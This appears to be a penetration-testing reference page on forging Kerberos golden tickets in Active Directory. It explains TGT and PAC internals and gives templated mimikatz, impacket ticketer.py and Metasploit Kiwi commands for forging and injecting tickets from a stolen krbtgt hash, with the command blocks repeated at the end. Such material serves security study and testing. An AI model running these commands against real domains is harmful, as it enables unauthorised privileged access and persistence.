Post Exploitation - Kerberos golden tickets

Overview

Kerberos is an authentication protocol, used within Active Directory that rely on the use of tickets to identify users and grant access to domain resources. Kerberos implements two type of tickets, issued by two distinct services of the Key Distribution Center (KDC):

Ticket-Granting Ticket (TGT), obtained from the Authentication Service (AS)
service tickets, obtained from the Ticket-Granting Service (TGS).

A TGT is generally requested by an user through a KRB_AS_REQ request to the AS of the KDC during the login process on a Windows system integrated to an Active Directory domain. TGTs are encrypted using one of the secrets (RC4 key, whose value is identical to the NTLM hash, or AES 128/256 bits keys) of the krbtgt account of the domain. After reception of the TGT, in a KRB_AS_REP response from the KDC, TGT are stored in memory by the client in the Security Support Provider (SSP) Kerberos of the Local Security Authority Server Service (LSASS) process.

An user authentication data is stored encrypted (using one of the secrets of the krbtgt account) in the Privilege Attribute Certificate (PAC) of the TGT and includes:

The Domain SID and User RID, which combination form the user's current Security Identifier (SID)
the user's SIDs kept in its SIDHistory attribute
The GROUP_MEMBERSHIP_ARRAY which contains the user's group memberships, in the form of the groups Relative ID (RID).

Whenever generating a service ticket, the TGT's PAC will be decrypted by the KDC, signed using both one of the secrets of the krbtgt account (KDC Signature) and of the targeted service account (Server Signature), and ultimately encrypted using one of the secrets the targeted service account.

Golden tickets are TGT forged with arbitrary authentication data. Indeed, the specified username, groups RID and SIDs will be added to the forged ticket PAC. The golden ticket can be injected in the current user session and used to directly request service tickets from the TGS.

To generate a golden ticket, the following prerequisites are needed:

The fully qualified domain name and the SID of the targeted domain.
One of the secrets of the targeted domain krbtgt account. The krbtgt RC4 key, corresponding to the NTLM hash of the krbtgt password, as well as the AES 128/256 bits keys can be used.

Note that while the user account specified for the golden ticket must be a member of the targeted domain, the arbitrary SIDs added in the SID history of the forged ticket (ExtraSids field of the PAC) can come from external domains or forests (for which trusts relationships are configured).

Golden tickets generation

The mimikatz kerberos::golden module and impacket's ticketer.py can be used to generate golden tickets.

The golden ticket's:

UserId (impersonated user's RID) can be specified using (mimikatz) /id / (ticketer.py) -user-id <USER_ID> and defaults to 500.
GroupIds (impersonated group memberships) can be specified using (mimikatz) /groups / (ticketer.py) -groups <GROUP_RID | GROUP_RID1, ..., GROUP_RIDN> and defaults to 513, 512, 520, 518, 519.
ExtraSids (impersonated user's SID History) can be specified using (mimikatz) /sids / (ticketer.py) -extra-sid <EXTRA_SID | EXTRA_SID1, ..., EXTRA_SIDN>.

# Retrives the domain SID.
Get-ADDomain | Ft DNSRoot, DomainSID

# [Windows] Golden tickets generation using mimikatz.
# The generated ticket can be directly injected in the current session using the "/ptt" option.
# Otherwise the golden ticket is exported in the KRB_CRED format (KIRBI file on disk).
mimikatz # kerberos::golden /user:<USERNAME> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> [/rc4:<KRBTGT_NTLM> | /aes128:<KRBTGT_AES128> | /aes256:<KRBTGT_AES256>] [/groups:<RID | RID_LIST>] [/sids:<EXTRA_SID | EXTRA_SIDS_LIST>]

# [Linux / Windows] Golden tickets generation using ticketer.py.
# The generated ticket is exported in the credential cache (ccache) format.
ticketer.py -domain <DOMAIN_FQDN> -domain-sid <DOMAIN_SID> [-nthash <KRBTGT_NTLM> | -aesKey <KRBTGT_AES128 | KRBTGT_AES256>] <USERNAME>
ticketer.py -domain <DOMAIN_FQDN> -domain-sid <DOMAIN_SID> [-nthash <KRBTGT_NTLM> | -aesKey <KRBTGT_AES128 | KRBTGT_AES256>] -user-id <500 | USER_ID> -groups <GROUP_RID | GROUP_RID1, ..., GROUP_RIDN> -extra-sid <EXTRA_SID | EXTRA_SID1, ..., EXTRA_SIDN> <USERNAME>

mimikatz with Metasploit

mimikatz 2.0 is available in a meterpreter shell as the Kiwi extension.

To following command can be used to load the extension in memory on a meterpreter shell: use kiwi

Once the module has been loaded, the golden_ticket_create command can be used to create a golden ticket:

golden_ticket_create -d '<FQDN_DOMAIN>' -s '<SID_DOMAIN>' -k '<KRBTGT_HASH>' -u '<USERNAME>' -t '<FULL_SAVE_PATH>'

Usage: golden_ticket_create [options]
OPTIONS:
    -d <opt>  FQDN of the target domain (required)
    -g <opt>  Comma-separated list of group identifiers to include (eg: 501,502)
    -h        Help banner
    -i <opt>  ID of the user to associate the ticket with
    -k <opt>  krbtgt domain user NTLM hash
    -s <opt>  SID of the domain
    -t <opt>  Local path of the file to store the ticket in (required)
    -u <opt>  Name of the user to create the ticket for (required)

Tickets can be loaded/purged using the kerberos_ticket_use and kerberos_ticket_purge commands:

kerberos_ticket_use <FULL_SAVE_PATH>
kerberos_ticket_purge

Golden tickets usage (Pass-the-Ticket)

On Windows, golden tickets generated using mimikatz will be automatically injected in the current logon session if the /ptt option is specified. Otherwise, an exported golden ticket can be injected using mimikatz.exe "kerberos::ptt <TICKET_FILE_PATH> for example.

On Linux, golden tickets, in the credential cache (ccache) format can be exported in the KRB5CCNAME environment variable for further use through tools supporting the Kerberos protocol, such as Impacket Python utilities.

Refer to the [ActiveDirectory] Kerberos tickets usage for more information on techniques and tools to leverage golden tickets.

References

https://2014.rmll.info/slides/80/day_3-1010-Benjamin_Delpy-Mimikatz_a_short_journey_inside_the_memory_of_the_Windows_Security_service.pdf https://adsecurity.org/?page_id=1821 TECHNIQUES DE PERSISTANCE ACTIVE DIRECTORY BASÉES SUR KERBEROS - MISC Hors-Série N°20 https://www.beneaththewaves.net/Projects/Mimikatz_20_-_Silver_Ticket_Walkthrough.html

PreviousPost Exploitation - ntds.dit dumping NextPost Exploitation - Trusts hopping

Last updated 3 years ago

# Retrives the domain SID. Get-ADDomain | Ft DNSRoot, DomainSID # [Windows] Golden tickets generation using mimikatz. # The generated ticket can be directly injected in the current session using the "/ptt" option. # Otherwise the golden ticket is exported in the KRB_CRED format (KIRBI file on disk). mimikatz # kerberos::golden /user:<USERNAME> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> [/rc4:<KRBTGT_NTLM> | /aes128:<KRBTGT_AES128> | /aes256:<KRBTGT_AES256>] [/groups:<RID | RID_LIST>] [/sids:<EXTRA_SID | EXTRA_SIDS_LIST>] # [Linux / Windows] Golden tickets generation using ticketer.py. # The generated ticket is exported in the credential cache (ccache) format. ticketer.py -domain <DOMAIN_FQDN> -domain-sid <DOMAIN_SID> [-nthash <KRBTGT_NTLM> | -aesKey <KRBTGT_AES128 | KRBTGT_AES256>] <USERNAME> ticketer.py -domain <DOMAIN_FQDN> -domain-sid <DOMAIN_SID> [-nthash <KRBTGT_NTLM> | -aesKey <KRBTGT_AES128 | KRBTGT_AES256>] -user-id <500 | USER_ID> -groups <GROUP_RID | GROUP_RID1, ..., GROUP_RIDN> -extra-sid <EXTRA_SID | EXTRA_SID1, ..., EXTRA_SIDN> <USERNAME>

golden_ticket_create -d '<FQDN_DOMAIN>' -s '<SID_DOMAIN>' -k '<KRBTGT_HASH>' -u '<USERNAME>' -t '<FULL_SAVE_PATH>' Usage: golden_ticket_create [options] OPTIONS: -d <opt> FQDN of the target domain (required) -g <opt> Comma-separated list of group identifiers to include (eg: 501,502) -h Help banner -i <opt> ID of the user to associate the ticket with -k <opt> krbtgt domain user NTLM hash -s <opt> SID of the domain -t <opt> Local path of the file to store the ticket in (required) -u <opt> Name of the user to create the ticket for (required)